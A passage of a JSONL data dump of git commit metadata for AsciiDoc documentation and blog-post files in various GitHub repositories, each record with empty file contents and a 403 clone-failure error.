(#23109)\n\n* Add note about min_score filtering efficiency\r\n\r\n* Reword to mention 'HAVING'\r\n\r\n* Remove reference to 
HAVING\r\n","repos":"rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,JSCooke\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,shreejay\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,obourgain\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,C-Bish\/elasticsearch,coding0011\/el
asticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,geidies\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,njlawton\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,elasticdog\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,lks21c\/elasticsearch,fernandozhu\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,glefloch\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra,scottsom\/elasticsearch,elasticdog\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,IanvsPoplicola\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,nazarewk\/elasticsearch,fernandozhu\/elasticsearch,Shepard1212\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,sneivandt\
/elasticsearch,shreejay\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,ZTE-PaaS\/elasticsearch,C-Bish\/elasticsearch","old_file":"docs\/reference\/query-dsl\/function-score-query.asciidoc","new_file":"docs\/reference\/query-dsl\/function-score-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92c2a4a270c05935ff81e769a14939216a2d0fa0","subject":"y2b create post The Most Comfortable Headphones Ever?","message":"y2b create post The Most Comfortable Headphones Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-30-The-Most-Comfortable-Headphones-Ever.adoc","new_file":"_posts\/2016-07-30-The-Most-Comfortable-Headphones-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc7a72de2af994278508ad9df937311aac485295","subject":"Update 2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","message":"Update 2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","new_file":"_posts\/2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab9c922a2c2861281c17e88775fdbb2d739ee3c","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"498b1fa458d468720a70271323f80232949bb354","subject":"Update 
2016-11-23-130000-JOB-OFFER.adoc","message":"Update 2016-11-23-130000-JOB-OFFER.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-23-130000-JOB-OFFER.adoc","new_file":"_posts\/2016-11-23-130000-JOB-OFFER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c1a37be362d3f8fb05c5a310c97452a771a0fb","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7499d0a0d4619c65fd4d6aae10b1d2696f069c1d","subject":"Update 2016-06-04-Distributing-Common-Java-AP-I.adoc","message":"Update 2016-06-04-Distributing-Common-Java-AP-I.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-06-04-Distributing-Common-Java-AP-I.adoc","new_file":"_posts\/2016-06-04-Distributing-Common-Java-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87e1d8c6fe08198455e260f30a95dfbccb94b6be","subject":"y2b create post They Call It The Hover Camera...","message":"y2b create post They Call It The Hover Camera...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-19-They-Call-It-The-Hover-Camera.adoc","new_file":"_posts\/2016-10-19-They-Call-It-The-Hover-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"194a3f9d6b3d8957b9a942cdb734e4bad4c1ed33","subject":"adding place holder for Mesos","message":"adding place holder for Mesos\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-mesos.adoc","new_file":"chapters\/docker-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b98117c0e75b3a8f2f3d289f5159722e48ea36a","subject":"y2b create post It's Like Candy For Your Eyeballs...","message":"y2b create post It's Like Candy For Your 
Eyeballs...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-27-Its-Like-Candy-For-Your-Eyeballs.adoc","new_file":"_posts\/2017-07-27-Its-Like-Candy-For-Your-Eyeballs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a6f8de8be8b94fd463248896bb67d55d75e537","subject":"y2b create post The $12 Smart Watch - Does It Suck?","message":"y2b create post The $12 Smart Watch - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The-12-Smart-Watch--Does-It-Suck.adoc","new_file":"_posts\/2017-12-07-The-12-Smart-Watch--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5bc83e4b6fb79af6d2f689e02758e48caac12a","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bad7960fc4f0ac19cee1c8d1ee70f7cf00e8ffb","subject":"y2b create post $10 Wireless Earbuds - Bargain or Bust?","message":"y2b create post $10 Wireless Earbuds - Bargain or Bust?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-27-10-Wireless-Earbuds--Bargain-or-Bust.adoc","new_file":"_posts\/2017-06-27-10-Wireless-Earbuds--Bargain-or-Bust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65f2573b5bd057b514dce60bd86a4f5db56ad0ad","subject":"Update 2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","message":"Update 2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","new_file":"_posts\/2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6c64a048d87fd2d7dd66fab34ca471afc6906fe","subject":"Remove redundant 'minimum_should_match'","message":"Remove redundant 'minimum_should_match'\n\nRelates 
#31600","repos":"uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/query-dsl\/common-terms-query.asciidoc","new_file":"docs\/reference\/query-dsl\/common-terms-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f16d0a09289c140a9bf3c5d16a86cdfed6572d9","subject":"Add rationale.","message":"Add rationale.\n","repos":"tcsavage\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,alesguzik\/cats,yurrriq\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dddb534c2ccb08a43c1efd66dd9520894eabea7f","subject":"Minor improvements on the documentation.","message":"Minor improvements on the documentation.\n","repos":"tcsavage\/cats,yurrriq\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"eddb64785ac620264d7a76be40affee9686faf1c","subject":"OGM-1017 Fix documentation typo","message":"OGM-1017 Fix documentation 
typo\n","repos":"DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,Sanne\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/cassandra.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/cassandra.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"d28fd26081a85807156ea17a36d1771f3ee86ba2","subject":"Update 2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","message":"Update 2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","repos":"murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io","old_file":"_posts\/2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","new_file":"_posts\/2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/murilo140891\/murilo140891.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a470150292faf463d109c998ec61a5f9066a6d","subject":"Update 2015-05-09-Estructuras-de-Control-Break-Continue.adoc","message":"Update 2015-05-09-Estructuras-de-Control-Break-Continue.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-09-Estructuras-de-Control-Break-Continue.adoc","new_file":"_posts\/2015-05-09-Estructuras-de-Control-Break-Continue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6be13197ba0de47290930a67d502cc93093e1c6e","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a79d9afa059b4b7e9147a411561703f591dc0f0a","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 
2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"408ce72f16063664bf2c7a2db857e4d891acb438","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c6b470fef64511b6d48331aaef221b7b63b03cb","subject":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af23082e617f69fd9709b08ecef28c01ec016655","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7544e60fc68d7e8c7b48c8296cef415ed6bd58ba","subject":"Publish 2016-08-20.adoc","message":"Publish 2016-08-20.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"2016-08-20.adoc","new_file":"2016-08-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b3d832e5049cb7f7b15e1109e3d6e95f83175e","subject":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce8d92b626b6b3a21fe4be131a64e0c641797c4a","subject":"y2b create post DON'T Buy A Wireless Speaker Without Watching This...","message":"y2b create post DON'T Buy A Wireless Speaker Without Watching This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-28-DONT-Buy-A-Wireless-Speaker-Without-Watching-This.adoc","new_file":"_posts\/2017-10-28-DONT-Buy-A-Wireless-Speaker-Without-Watching-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"027c005db09bebbd347502b6af1d37e17d2ff6e1","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 